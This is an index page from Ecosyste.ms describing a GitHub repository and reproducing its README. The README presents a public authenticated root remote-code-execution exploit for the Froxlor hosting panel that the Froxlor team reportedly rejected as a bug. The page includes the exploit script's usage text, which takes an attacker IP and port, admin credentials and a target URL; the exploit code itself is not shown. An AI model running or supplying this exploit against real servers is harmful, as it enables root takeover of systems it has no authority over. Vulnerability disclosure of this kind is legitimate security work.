Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sarperavci/froxlor-authenticated-root-rce-exploit
Last synced: 6 days ago
- Host: GitHub
- URL: https://github.com/sarperavci/froxlor-authenticated-root-rce-exploit
- Owner: sarperavci
- Created: 2024-09-10T08:49:50.000Z (2 months ago)
- Default Branch: main
- Last Pushed: 2024-09-10T11:35:55.000Z (2 months ago)
- Last Synced: 2024-09-10T13:12:02.634Z (2 months ago)
- Language: Python
- Size: 3.91 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Froxlor Authenticated root RCE Exploit
This authenticated RCE exploit was found by me and rejected by the Froxlor team. I am releasing it now because there is no point in keeping it private if it's a feature.
For a live demo, you can watch [https://github.com/sarperavci/Froxlor-Authenticated-root-RCE-Exploit/blob/main/demo.mp4](https://github.com/sarperavci/Froxlor-Authenticated-root-RCE-Exploit/blob/main/demo.mp4)
For more information, you can visit [https://sarperavci.com/Froxlor-Authenticated-RCE/](https://sarperavci.com/Froxlor-Authenticated-RCE/)
## Description
This exploit allows an authenticated admin to execute arbitrary code on the server as **root**, even if the server is running as **www-data**.
## Usage
```bash
$ python3 exploit.py -h
usage: exploit.py -i 10.10.10.2 -p 12345 -u admin -P password -U http://10.10.10.10:8081

Froxlor Authenticated RCE with Root Privileges Exploit by @sarperavci

optional arguments:
  -h, --help                        show this help message and exit
  -i IP, --ip IP                    Attacker IP Address
  -p PORT, --port PORT              Attacker Port
  -u USER, --user USER              Froxlor Admin Username
  -P PASSWORD, --password PASSWORD  Froxlor Admin Password
  -U URL, --url URL                 Base URL of the Froxlor Panel
```